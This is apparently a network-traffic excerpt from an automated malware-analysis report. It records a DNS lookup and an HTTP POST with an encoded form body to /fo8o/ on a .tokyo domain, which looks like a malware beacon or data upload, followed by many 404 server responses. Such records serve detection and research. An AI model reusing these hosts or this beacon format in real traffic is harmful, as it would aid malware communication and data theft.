Source: global traffic DNS traffic detected: DNS query: www.shenzhoucui.com
Source: unknown HTTP traffic detected: POST /fo8o/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enAccept-Encoding: gzip, deflate, brHost: www.kasegitai.tokyoOrigin: http://www.kasegitai.tokyoCache-Control: no-cacheConnection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 209Referer: http://www.kasegitai.tokyo/fo8o/User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)Data Raw: 50 6c 6d 30 6d 6e 36 38 3d 35 4a 6c 4b 4c 7a 61 4b 56 70 31 77 4a 5a 76 70 77 56 49 68 75 42 43 58 53 48 62 6c 32 71 6c 5a 2b 79 49 57 5a 2b 61 46 2f 2f 42 72 6b 77 51 5a 6d 6c 71 64 38 54 35 32 76 54 57 45 67 77 41 56 68 42 38 69 6e 33 6f 45 74 35 2f 53 55 34 79 6d 76 43 4e 39 73 66 79 73 79 67 68 45 77 5a 4f 31 47 62 49 4d 4c 67 45 53 42 69 78 58 65 77 45 46 2f 33 64 62 2b 4f 4f 6c 58 45 70 6a 39 6f 58 75 59 57 54 43 67 42 68 32 50 37 39 7a 47 73 76 43 58 68 7a 62 50 30 42 39 74 70 48 4a 50 4e 6d 66 66 6d 44 41 36 52 35 2f 75 5a 49 5a 42 33 6f 64 4f 69 33 35 50 77 32 33 34 51 51 53 54 4c 38 4c 57 2b 46 67 66 30 67 3d Data Ascii: Plm0mn68=5JlKLzaKVp1wJZvpwVIhuBCXSHbl2qlZ+yIWZ+aF//BrkwQZmlqd8T52vTWEgwAVhB8in3oEt5/SU4ymvCN9sfysyghEwZO1GbIMLgESBixXewEF/3db+OOlXEpj9oXuYWTCgBh2P79zGsvCXhzbP0B9tpHJPNmffmDA6R5/uZIZB3odOi35Pw234QQSTL8LW+Fgf0g=
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 23 May 2024 18:20:47 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 18:21:03 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 18:21:06 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 18:21:08 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 18:21:11 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Thu, 23 May 2024 18:21:46 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-05-23T18:21:51.8920515Z
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Thu, 23 May 2024 18:21:49 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 18X-Rate-Limit-Reset: 2024-05-23T18:21:51.8920515Z
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Thu, 23 May 2024 18:21:51 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-05-23T18:21:56.9522586Z
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Thu, 23 May 2024 18:21:54 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-05-23T18:21:59.4967144Z
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 18:22:22 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 18:22:25 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 18:22:27 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 18:22:30 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 18:22:36 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 18:22:38 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 18:22:41 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 18:22:43 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>
